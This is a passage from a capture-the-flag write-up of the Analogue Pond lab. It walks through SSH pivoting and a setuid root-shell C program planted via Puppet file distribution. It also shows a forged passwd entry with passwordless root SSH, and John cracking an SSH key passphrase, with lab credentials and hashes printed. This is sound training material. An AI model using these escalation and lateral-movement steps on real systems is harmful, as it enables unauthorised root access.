582.  
583. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
584. applicable law.
585.  
586. sandieshaw@puppet:~$ id
587. uid=1000(sandieshaw) gid=1000(sandieshaw) groups=1000(sandieshaw),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
588. sandieshaw@puppet:~$
589.  
590. We nmap scan 192.168.122.2 and find port 8140 has a webrick web server on it. The victim machine does not currently have proxychains installed, but since we're root, why not install it.
591.  
592. apt-get install proxychains
593.  
594. ssh -f -N -D 7171 sandieshaw@192.168.122.2
595.  
596. root@analoguepond:~# ssh -f -N -D 7171 sandieshaw@192.168.122.2
597. +-----------------------------------------------------------------------------+
598. | Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
599. | most famous song |
600. +-----------------------------------------------------------------------------+
601. sandieshaw@192.168.122.2's password:
602. root@analoguepond:~# netstat -antplu
603. Active Internet connections (servers and established)
604. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
605. tcp 0 0 192.168.122.1:53 0.0.0.0:* LISTEN 1192/dnsmasq
606. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 915/sshd
607. tcp 0 0 127.0.0.1:7171 0.0.0.0:* LISTEN 6977/ssh
608. tcp 0 0 127.0.0.1:5900 0.0.0.0:* LISTEN 1199/qemu-system-x8
609. tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 1233/qemu-system-x8
610. tcp 0 0 192.168.1.249:22 192.168.1.66:52436 ESTABLISHED 5314/sshd: eric [pr
611. tcp 0 0 192.168.1.249:22 192.168.1.66:52696 ESTABLISHED 5533/sshd: eric [pr
612. tcp 0 0 192.168.1.249:22 192.168.1.66:52422 ESTABLISHED 5276/sshd: eric [pr
613. tcp 0 0 192.168.1.249:22 192.168.1.66:52544 ESTABLISHED 5475/sshd: eric [pr
614. tcp 0 0 192.168.122.1:50416 192.168.122.2:22 ESTABLISHED 6977/ssh
615. tcp 0 0 192.168.1.249:22 192.168.1.66:52920 ESTABLISHED 6541/sshd: eric [pr
616. tcp 0 0 192.168.122.1:40201 192.168.122.2:22 ESTABLISHED 6532/ssh
617. tcp6 0 0 :::22 :::* LISTEN 915/sshd
618. tcp6 0 0 ::1:7171 :::* LISTEN 6977/ssh
619. udp 0 0 0.0.0.0:42984 0.0.0.0:* 976/snmpd
620. udp 0 0 192.168.122.1:53 0.0.0.0:* 1192/dnsmasq
621. udp 0 0 0.0.0.0:67 0.0.0.0:* 1192/dnsmasq
622. udp 0 0 0.0.0.0:68 0.0.0.0:* 662/dhclient
623. udp 12480 0 0.0.0.0:41040 0.0.0.0:* 662/dhclient
624. udp 0 0 0.0.0.0:161 0.0.0.0:* 976/snmpd
625. udp6 0 0 ::1:161 :::* 976/snmpd
626. udp6 0 0 :::39304 :::* 662/dhclient
627. root@analoguepond:~#
628.  
629. now we should be able to reach the new host(I hope).
630.  
631. we open firefox and setup a socks proxy with our ssh port for 7070 and host 127.0.0.1
632. Then we open https://192.168.122.2:8140/ and we cna reach the website on the inner server.
633.  
634. The environment must be purely alphanumeric, not ''
635.  
636. https://192.168.122.2:8140/0x27
637. The indirection name must be purely alphanumeric, not ''
638.  
639. Will come back to this, after I think a bit more on ideas.
640.  
641.  
642. As of now, we should start enumerating what is here, as we also have sandieshaws login over ssh. Lets look for the web files.
643.  
644. sandieshaw@puppet:/tmp$ cat /etc/passwd
645. root:x:0:0:root:/root:/bin/bash
646. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
647. bin:x:2:2:bin:/bin:/usr/sbin/nologin
648. sys:x:3:3:sys:/dev:/usr/sbin/nologin
649. sync:x:4:65534:sync:/bin:/bin/sync
650. games:x:5:60:games:/usr/games:/usr/sbin/nologin
651. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
652. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
653. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
654. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
655. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
656. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
657. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
658. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
659. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
660. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
661. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
662. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
663. libuuid:x:100:101::/var/lib/libuuid:
664. syslog:x:101:104::/home/syslog:/bin/false
665. messagebus:x:102:106::/var/run/dbus:/bin/false
666. landscape:x:103:109::/var/lib/landscape:/bin/false
667. sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
668. sandieshaw:x:1000:1000:Sandra Ann Goodrich,,,:/home/sandieshaw:/bin/bash
669. puppet:x:105:112:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
670. sandieshaw@puppet:/tmp$
671.  
672. #lets update our hosts file again.
673. 192.168.1.249 analoguepond
674. 192.168.122.2 puppet.example.com
675. 192.168.122.3 barringsbank.example.com
676.  
677.  
678. quick reminders:
679. VNC Port forwarding through tunnel:
680. ssh -L 5901:127.0.0.1:5901 -N -f -l eric 192.168.1.249
681. ssh -L 5900:127.0.0.1:5900 -N -f -l eric 192.168.1.249
682.  
683.  
684. Dynamic ssh tunnel for proxy chains
685. ssh -f -N -D 7070 eric@192.168.1.249
686.  
687.  
688. while SSH'ed into 192.168.1.249
689. ssh sandieshaw@192.168.122.2
690. puppetonastring
691.  
692. from within 192.168.1.249
693. apt-get install nmap
694. nmap -sC -sV -T5 -v -p- --script vuln 192.168.122.3
695.  
696. Nmap scan report for barringsbank.example.com (192.168.122.3)
697. Host is up (0.0048s latency).
698. Not shown: 65534 closed ports
699. PORT STATE SERVICE VERSION
700. 22/tcp open tcpwrapped
701.  
702.  
703. on sandieshaw in /tmp is program called spin. when run, it makes a spinning symbol on the screen. After copying it out to our machine and running strings, we can see lots of functions but no clue what they do. So we start browsing the system, and we find another spin file. It's in /etc/puppet/wiffle/files/spin with a spin.c
704.  
705. We place a bash script named spin in this directory, then wait and find later that our shell script has moved to/tmp as /tmp/spin with system privs. However, even though it's owne by root as a system file, it doesn't seem to give is a shell, as it's running in the same user context as us, which is limited user shell.
706.  
707. We try another method using a c program as follows.
708.  
709. #gcc root.c -o spin
710. int main(void){
711. setresuid(0, 0, 0);
712. system("/bin/bash");
713. }
714.  
715. We compile locally, move to eric and then down to sandieshaw. We place it back in the /etc/puppet/wiggle/files/ directory as spin, and then wait till it
716. moves it back to /tmp again. This time around, it exeutes our suid call, and spawns us a shell as root!
717.  
718. :)
719.  
720. sandieshaw@puppet:/tmp$ ls -la
721. total 24
722. drwxrwxrwt 2 root root 4096 Apr 26 08:30 .
723. drwxr-xr-x 22 root root 4096 Jan 7 11:45 ..
724. -rwsr-xr-x 1 root root 8688 Apr 26 08:30 spin
725. -rwxrwxr-x 1 sandieshaw sandieshaw 22 Apr 26 07:32 uname
726. sandieshaw@puppet:/tmp$ spin
727. root@puppet:/tmp# id
728. uid=0(root) gid=1000(sandieshaw) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(sandieshaw)
729. root@puppet:/tmp#
730.  
731. We go to the root folder and have a look around
732.  
733. ./protovision:
734. total 24K
735. 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 .
736. 4.0K drwx------ 4 root root 4.0K Jan 7 17:49 ..
737. 4.0K -rw-r--r-- 1 root root 401 Dec 21 22:15 flag1.txt.0xff
738. 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 .I_have_you_now
739. 4.0K -rw-r--r-- 1 root root 39 Dec 17 12:51 jim
740. 4.0K -rw-r--r-- 1 root root 53 Dec 17 12:51 melvin
741.  
742. ./protovision/.I_have_you_now:
743. total 84K
744. 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 .
745. 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 ..
746. 4.0K drwxr-xr-x 3 root root 4.0K Dec 18 15:29 .a
747. 72K -r-------- 1 root root 71K Dec 18 15:23 grauniad_1995-02-27.jpeg
748.  
749.  
750. ./protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z:
751. total 16K
752. 4.0K drwxr-xr-x 2 root root 4.0K Dec 21 23:20 .
753. 4.0K drwxr-xr-x 3 root root 4.0K Dec 18 18:42 ..
754. 4.0K ---x------ 1 root root 7 Dec 18 15:34 my_world_you_are_persistent_try
755. 4.0K -rw-r--r-- 1 root root 1.4K Dec 21 22:10 nleeson_key.gpg
756.  
757. less /root/protovision/flag1.txt.0xff
758.  
759.  
760. root@puppet:/root# cat /root/protovision/jim /root/protovision/melvin /root/protovision/flag1.txt.0xff
761. Mr Potato Head! Backdoors are not a...
762. Boy you guys are dumb! I got this all figured out...
763. 3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861
764. root@puppet:/root#
765.  
766. cat flag1.txt.0xff
767. 3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861
768. root@kali:/mnt/HDD2/ctf/analouge-pond# cat flag1.txt.0xff | xxd -r -p | rev | base64 -d
769. https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...
770.  
771. root@kali:/mnt/HDD2/ctf/analouge-pond#
772.  
773.  
774. ssh root@192.168.122.3
775. ssh_exchange_identification: read: Connection reset by peer
776.  
777. we edit /etc/hosts.deny which seems to be blocking outbound ssh connections?
778.  
779. known_hosts on puppet /root/.ssh - |1|qEUhT3+BE6VMnDOqXiC0QTUVaE0=|AntYS4Su9EBESzdihQO62CZgc0A= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLcUc6YYOlbXM7YzsXo/GDT3C2mwx6H8lsBPbKVr+6HBAfdJXpCXSiDh0II3Ie0j2y4e2fjV+x1yHeGVUi3Lff8=
780.  
781. Eventually we find that the .3 server has some contorl through the use of the puppet scripts in /etc/puppet/modules/vulnhub/files
782.  
783. We edit the sshd login deets to allow root login, with no password, and as an allowed user, and also disable pam requirment. We need to wait till spin kicks in and uploades the files(hopefully).
784.  
785. We also edit the hosts.deny files and allow sshd to do its thing. We know sandieshaw was allowed to login via the scripts. lets try her first.
786.  
787. we copy sandieshaw's entry line from puppet-passwd over to barringsbank-passwd as well, ensuring we have a name on the system(in theory)with the password password:
788. openssl passwd -1 -salt xyz password
789. $1$xyz$cEUv8aN9ehjhMXG/kSFnM1
790.  
791. sandieshaw:$1$xyz$cEUv8aN9ehjhMXG/kSFnM1:1000:1000:Sandra Ann Goodrich,,,:/home/sandieshaw:/bin/bash
792.  
793. ssh sandieshaw@192.168.122.3
794.  
795. ssh sandieshaw@192.168.122.3
796. sandieshaw@192.168.122.3's password:
797. Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)
798.  
799. * Documentation: https://help.ubuntu.com/
800.  
801. System information as of Wed Apr 26 06:47:18 BST 2017
802.  
803. System load: 5.81 Memory usage: 4% Processes: 106
804. Usage of /: 72.3% of 1.59GB Swap usage: 0% Users logged in: 0
805.  
806. Graph this data and manage this system at:
807. https://landscape.canonical.com/
808.  
809. 173 packages can be updated.
810. 103 updates are security updates.
811.  
812. New release '16.04.2 LTS' available.
813. Run 'do-release-upgrade' to upgrade to it.
814.  
815.  
816. The programs included with the Ubuntu system are free software;
817. the exact distribution terms for each program are described in the
818. individual files in /usr/share/doc/*/copyright.
819.  
820. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
821. applicable law.
822.  
823.  
824. The programs included with the Ubuntu system are free software;
825. the exact distribution terms for each program are described in the
826. individual files in /usr/share/doc/*/copyright.
827.  
828. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
829. applicable law.
830.  
831. Could not chdir to home directory /home/sandieshaw: No such file or directory
832. nleeson@barringsbank:/$
833.  
834.  
835.  
836. thats a nice feeling :)
837.  
838. we probably should have put an entry in there for nleeson user as password, but lets just play with the system for now..
839.  
840. nleeson@barringsbank:/home/nleeson$ netstat -antplu
841. (No info could be read for "-p": geteuid()=1000 but you should be root.)
842. Active Internet connections (servers and established)
843. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
844. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
845. tcp 0 0 192.168.122.3:22 192.168.122.2:35430 ESTABLISHED -
846. tcp6 0 0 :::22 :::* LISTEN -
847. udp 0 0 0.0.0.0:68 0.0.0.0:* -
848. udp 0 0 0.0.0.0:31345 0.0.0.0:* -
849. udp6 0 0 :::14309 :::* -
850. nleeson@barringsbank:/home/nleeson$
851.  
852. no webserver running.
853.  
854. nleeson@barringsbank:/home/nleeson$ cat /etc/issue /etc/*ele*;uname -a
855. Ubuntu 14.04.3 LTS \n \l
856.  
857. DISTRIB_ID=Ubuntu
858. DISTRIB_RELEASE=14.04
859. DISTRIB_CODENAME=trusty
860. DISTRIB_DESCRIPTION="Ubuntu 14.04.3 LTS"
861. NAME="Ubuntu"
862. VERSION="14.04.3 LTS, Trusty Tahr"
863. ID=ubuntu
864. ID_LIKE=debian
865. PRETTY_NAME="Ubuntu 14.04.3 LTS"
866. VERSION_ID="14.04"
867. HOME_URL="http://www.ubuntu.com/"
868. SUPPORT_URL="http://help.ubuntu.com/"
869. BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
870. Linux barringsbank 4.4.0-57-generic #78~14.04.1-Ubuntu SMP Sat Dec 10 00:14:47 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
871.  
872. We're going to put our suid root.c program, onto the new host, bia puppet init.pp
873.  
874. ##w00t for r00t
875. file { "/tmp/roots":
876. ensure => "directory",
877. recurse => true,
878. purge => true,
879. force => true,
880. owner => root,
881. group => root,
882. mode => 4755,
883. source => "puppet:///modules/vulnhub/roots",
884. }
885.  
886. apt-get install nano
887.  
888. We add to init.pp on sandieshaw server. We then wait and see if it shows up in /tmp on nleeson server.
889.  
890. and, we are grooooooot..er, I am root.
891.  
892. /etc/shadow
893. nleeson:$6$sspRmsSA$fD6XXOHUcf1UniBIAuGcFnJ4Qz49IlIdweutehpNDdTk9u9mAeAej9ToMUDrh3af/nsYQ787eXbKFTZpRtRSN/:17150:0:99999:7:::
894.  
895. web server process on eric? /usr/lib/ruby/vendor_ruby/puppet/application/master.rb
896.  
897. root@puppet:/usr/lib/ruby/vendor_ruby/puppet/network/http/rack# cat /etc/puppet/puppet.conf
898. [main]
899. logdir=/var/log/puppet
900. vardir=/var/lib/puppet
901. ssldir=/var/lib/puppet/ssl
902. rundir=/var/run/puppet
903. factpath=$vardir/lib/facter
904. templatedir=$confdir/templates
905. prerun_command=/etc/puppet/etckeeper-commit-pre
906. postrun_command=/etc/puppet/etckeeper-commit-post
907. certname=puppet.example.com
908.  
909. [master]
910. # These are needed when the puppetmaster is run by passenger
911. # and can safely be removed if webrick is used.
912. ssl_client_header = SSL_CLIENT_S_DN
913. ssl_client_verify_header = SSL_CLIENT_VERIFY
914. dns_alt_names = puppet, puppet.example.com
915.  
916. [agent]
917. server = puppet.example.com
918.  
919.  
920. root@puppet:/etc/puppet# cat fileserver.conf
921. # This file consists of arbitrarily named sections/modules
922. # defining where files are served from and to whom
923.  
924. # Define a section 'files'
925. # Adapt the allow/deny settings to your needs. Order
926. # for allow/deny does not matter, allow always takes precedence
927. # over deny
928. [files]
929. path /etc/puppet/files
930. # allow *.example.com
931. # deny *.evil.example.com
932. # allow 192.168.0.0/24
933.  
934. [plugins]
935. # allow *.example.com
936. # deny *.evil.example.com
937. # allow 192.168.0.0/24
938. root@puppet:/etc/puppet#
939.  
940. nleeson_key.gpg
941. root@puppet:~/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z#
942. gpg -d nleeson_key.gpg
943. gpg: CAST5 encrypted data
944. gpg: gpg-agent is not available in this session
945. gpg: encrypted with 1 passphrase
946. -----BEGIN RSA PRIVATE KEY-----
947. Proc-Type: 4,ENCRYPTED
948. DEK-Info: AES-128-CBC,1864E0393453C88F778D5E02717B8B16
949.  
950. RTSpHZnf1Onpy3OHfSat0Bzbrx8wd6EBKlbdZiGjEB0AC4O0ylrSBoWsEJ/loSL8
951. jdTbcSG0/GWJU7CS5AQdK7KctWwqnOHe9y4V15gtZcfgxNLrVfMUVAurZ3n2wQqK
952. ARmqBXhftPft8EBBAwWwQmBrD+ufF2uaJoKr4Bfu0zMFQxRnNDooBes5wyNO/7k6
953. osvGqTEX/xwJG1GB5X0jsDCmBH4WXhafa0nzZXvd2Pd3UpaWPEgyq3vxIQaredR8
954. VbJbPSeKypTIj3UyEj+kjczhCiWw9t0Mv0aV4FtMOesnDQYJskL8kSLGRkN+7lHD
955. IcHz7az9oqYGBSq77lPkmk7oIpT/pg80pfCyHExROwlTRPzVRHv7KGiKd35R0Hl9
956. 7CUQPCjH5ltQW4B6XUmxmoT8N14w5HOxb/JlV7s2g6dXYT0azOeqDsGivpgMY3vy
957. rtVakLIsZeYaZYSr6WvTFclXWYctYPMgzRewiRPjyn6DXiD6MtCJZj2CqJ47tP37
958. eRRgRRH6a1Sm/BkfSPIXlV0tTpOXfjtHG7VoIc5X343GL/WHM/nhNFvMLdRnVXRM
959. YOEKAsYklBLqZ99btTESwJZt9HG/cGpQrbgFwxKPoJy7f5wNLOa1ZhpDyw1IqokO
960. Pq4r8zZj4ASyg3gl7ByG11C272mkMG8yiIwOckVgNec/se18PUGBw1HHgRuyzDym
961. /6/cwkDzoJlResjsNDQCQcNzSOoZxi3GFIIiB+HjG84MF+ofnn3ayaUZLUaBbPMJ
962. jQ7dP6wqIMYwY5ZM6nRQ+RnL6QVBHnXH9RjmbzdVMzmQDjPS0lOg5xkU8B78vG6e
963. lphvmlLSM+PFVOqPwhVB8yon97aU23npKIOPu44VsUXU0auKI94qoX0I1EDDQFrE
964. UqpWUpCCHrRRTZCdnnE6RnJZ+rjGPvFA95lhUp1fpF8l4U3a8qKlsdtWmzYxHdyg
965. +w0QE8VdDsNqgCP7W6KzvN5E5HJ0bbQasadAX5eDd6I94V0fCZrPlzM+5CAXH4E4
966. qhmWQPCw7Q1CnW61yG8e9uD1W7yptK5NyZpHHkUbZGIS+P7EZtS99zDPh3V4N7I2
967. Mryzxkmi2JyQzf4T1cfK7JTdIC2ULGmFZM26BX3UCV0K+9OOGgRDPU4noS0gNHxP
968. VaWVmjGgubE4GDlW0tgw1ET+LaUdAv/LE+3gghpRLn1imdaW9elnIeaVeOWcyrBC
969. Ypl8AjYXNRd0uLWBC8xbakmK1tZUPXwefqjQpKjuIuYmmVes3M4DFxGQajmK03nO
970. oGaByHu0RVjy0x/zBuOuOp6eKpeaiLWfLM5DSIWlksL/2dmAloSs3LrIPu4dTnRb
971. v2YQ+72nLI62alLEaKwXUBoHSSRNTv0hbOyvV8YUp4EmJ8yShAmEE/n9Et62BwYB
972. rsi0RhEfih+43PzlwB91I4Elr2k3eBwQ9XiF3KdVgj6wvwqNLZ7aC5YpLcYaVyNT
973. fKzUxX02Ejvo60xWJ8u6GIhUK404s2WVeG/PCLwtrKGjpyPCn3yCWpCWpGPuVNrx
974. Wg0Um581e4Vw5CLDL5hRLmo7wiqssuL3/Uugf/lc2vF+MxJyoI1F9Zkt2xvRYrLB
975. -----END RSA PRIVATE KEY-----
976. gpg: WARNING: message was not integrity protected
977.  
978.  
979. verified that password is joshua
980. john hashes
981. Using default input encoding: UTF-8
982. Loaded 1 password hash (SSH [RSA/DSA 32/64])
983. Press 'q' or Ctrl-C to abort, almost any other key for status
984. joshua (nleeson_key.key)
985. 1g 0:00:00:00 DONE 2/3 (2017-04-26 11:40) 10.00g/s 123620p/s 123620c/s 123620C/s joshua
986. Use the "--show" option to display all of the cracked passwords reliably
987. Session completed
988.  
989. root@analoguepond:/home# ssh -i rsa.key nleeson@192.168.122.3
990. Enter passphrase for key 'rsa.key':
991. Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)
992.  
993. * Documentation: https://help.ubuntu.com/
994.  
995. System information as of Wed Apr 26 14:57:54 BST 2017
996.  
997. System load: 0.0 Processes: 109
998. Usage of /: 72.4% of 1.59GB Users logged in: 0
999. Memory usage: 8% IP address for eth0: 192.168.122.3
1000. Swap usage: 0%
1001.  
1002. Graph this data and manage this system at:
1003. https://landscape.canonical.com/
1004.  
1005. 173 packages can be updated.
1006. 103 updates are security updates.
1007.  
1008. New release '16.04.2 LTS' available.
1009. Run 'do-release-upgrade' to upgrade to it.
1010.  
1011.  
1012. The programs included with the Ubuntu system are free software;
1013. the exact distribution terms for each program are described in the
1014. individual files in /usr/share/doc/*/copyright.
1015.  
1016. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
1017. applicable law.
1018.  
1019. nleeson@barringsbank:~$
1020.  
1021.  
1022. so far I have:
1023. - Troll Flag - flag.txt
1024. - Flag1.txt.0xff which gave us the hint for the password "secret" to decode gpg file
1025. > - Flag 1: You have it when you book Jennifer tickets to Paris on Pan Am. < reference for secret/wargames
1026. - ssh-rsa password joshua (which was also given as a hint in same server from where we got flag1)
1027. - root on eric,sandie and nleeson
1028.  
1029. Todo:
1030. - vnc passwords on eric 5900 and 5901
1031. - decrypt nleeson's /etc/shadow password
1032. - Flag 2: It will include a final challenge to confirm you hit the jackpot.
1033.  
1034.  
1035. virsh # list
1036. Id Name State
1037. ----------------------------------------------------
1038. 2 puppet running
1039. 3 barringsbank running
1040.  
1041. virsh # dominfo puppet
1042. Id: 2
1043. Name: puppet
1044. UUID: 3561f84c-71c3-f16f-4a7b-9097e7d2ac39
1045. OS Type: hvm
1046. State: running
1047. CPU(s): 1
1048. CPU time: 5244.9s
1049. Max memory: 1048576 KiB
1050. Used memory: 1048576 KiB
1051. Persistent: yes
1052. Autostart: enable
1053. Managed save: no
1054. Security model: apparmor
1055. Security DOI: 0
1056. Security label: libvirt-3561f84c-71c3-f16f-4a7b-9097e7d2ac39 (enforcing)
1057.  
1058. virsh # dominfo barringsbank
1059. Id: 3
1060. Name: barringsbank
1061. UUID: 6cf27edd-7559-d6eb-1502-d3135c807785
1062. OS Type: hvm
1063. State: running
1064. CPU(s): 1
1065. CPU time: 3738.7s
1066. Max memory: 1048576 KiB
1067. Used memory: 1048576 KiB
1068. Persistent: yes
1069. Autostart: enable
1070. Managed save: no
1071. Security model: apparmor
1072. Security DOI: 0
1073. Security label: libvirt-6cf27edd-7559-d6eb-1502-d3135c807785 (enforcing)
1074.  
1075. virsh #
1076.  
1077. dumpxml puppet
1078. <domain type='qemu' id='2'>
1079. <name>puppet</name>
1080. <uuid>3561f84c-71c3-f16f-4a7b-9097e7d2ac39</uuid>
1081. <description>puppetmaster if you mess with this VM I will sendyoubacktowalker</description>
1082.  
1083. vncviewer 127.0.0.1:5900
1084. password sendyoubacktowalker
1085.  
1086.  
1087. virsh # dumpxml barringsbank
1088. <domain type='qemu' id='3'>
1089. <name>barringsbank</name>
1090. <uuid>6cf27edd-7559-d6eb-1502-d3135c807785</uuid>
1091. <description>Who do you think you are...? David Lightman from memphistennessee...?</description>
1092.  
1093.  
1094. vncviewer 127.0.0.1:5901
1095. password memphistennessee...
1096. (but David Lightman was from Seattle, Washington??)
1097.  
1098.  
1099. With that, we've completed the challenges!
1100.  
1101.  
1102. so far I have:
1103. - Troll Flag - flag.txt
1104. - Flag1.txt.0xff which gave us the hint for the password "secret" to decode gpg file
1105. > - Flag 1: You have it when you book Jennifer tickets to Paris on Pan Am. < reference for secret/wargames
1106. - ssh-rsa password joshua (which was also given as a hint in same server from where we got flag1)
1107. - root on eric,sandie and nleeson via exploits/password discover
1108. - vncviewer 127.0.0.1:5901 / password memphistennessee...
1109. - vncviewer 127.0.0.1:5900 / password sendyoubacktowalker
1110. - have access to bank server on vnc, but don't know root password or user(s) passwords from the login prompt,
1111. although we have the ssh-rsa key, we can ssh into it as nleeson with password joshua using the decoded rsa key
1112.  
1113. AS of now, I don't know of what else there could be to do other than crack the /etc/shadow for nleeson, which isn't needed to gain root on the bank server.
1114.  
1115. Def feel like I missed something, but I had a lot of fun working my way through this CTF.
1116.  
1117. Spoke with op on twitter, gave me a hint for this one. Inspecting the images, we find a hidden message in me.jpg
1118.  
1119. root@kali:~/HDD2/ctf/analouge-pond# steghide --info me.jpg
1120. "me.jpg":
1121. format: jpeg
1122. capacity: 11.9 KB
1123. Try to get information about embedded data ? (y/n) y
1124. Enter passphrase:
1125. steghide: could not extract any data with that passphrase!
1126. root@kali:~/HDD2/ctf/analouge-pond# steghide --info me.jpg
1127. "me.jpg":
1128. format: jpeg
1129. capacity: 11.9 KB
1130. Try to get information about embedded data ? (y/n) y
1131. Enter passphrase:
1132. embedded file "primate_egyptian_flag.txt":
1133. size: 3.7 KB
1134. encrypted: rijndael-128, cbc
1135. compressed: yes
1136. root@kali:~/HDD2/ctf/analouge-pond#
1137.  
1138.  
1139. steghide --extract -sf me.jpg
1140. Enter passphrase: reticulatingsplines
1141. wrote extracted data to "primate_egyptian_flag.txt".
1142. root@kali:~/HDD2/ctf/analouge-pond#
1143.  
1144.  
1145. cat primate_egyptian_flag.txt | xxd -r -p | rev | base64 -d
1146.  
1147. Here's a fender bass for you...
1148.  
1149. ,-. _.---._
1150. | `\.__.-'' `.
1151. \ _ _ ,. \
1152. ,+++=._________________)_||______|_|_|| |
1153. (_.ooo.===================||======|=|=|| |
1154. ~~' | ~' `~' o o /
1155. \ /~`\ o o /
1156. `~' `-.____.-'
1157.  
1158.  
1159. Congratulations to you once again and for the sixth time on capturing this
1160. flag!
1161.  
1162. I've tried to mix things up a bit here, to move away from throw metasploit
1163. and web exploits at things. I hope you have enjoyed that portion and your
1164. feedback on this aspect would be appreciated.
1165.  
1166. Of note, these VMs are set to do automatic security updates using puppet,
1167. so this ought to keep things dynamic enough for people.
1168.  
1169. Many thanks to mrB3n, Rand0mByteZ and kevinnz for testing this CTF.
1170.  
1171. A special thank you to g0tmi1k for hosting all these challenges and the
1172. valuable advice. A tip of the hat to mrb3n for his recent assistance. Hit
1173. me on IRC or twitter if you are looking for a hint or have completed the
1174. challenge.
1175.  
1176. Go on, Complete the circle: 06:30 to 07:45 of episode #1 of Our Friends In
1177. The North (C) BBC 1995.. What's the connection....?
1178. --Knightmare
1179.  
1180.  
1181. Awesome!
1182.  
1183. https://www.youtube.com/watch?v=ChwPpktNqe0
1184. New Orleans, Baton Rouge and The Rising Sun
1185. Also the commonality of "war"?
1186.  
1187. :)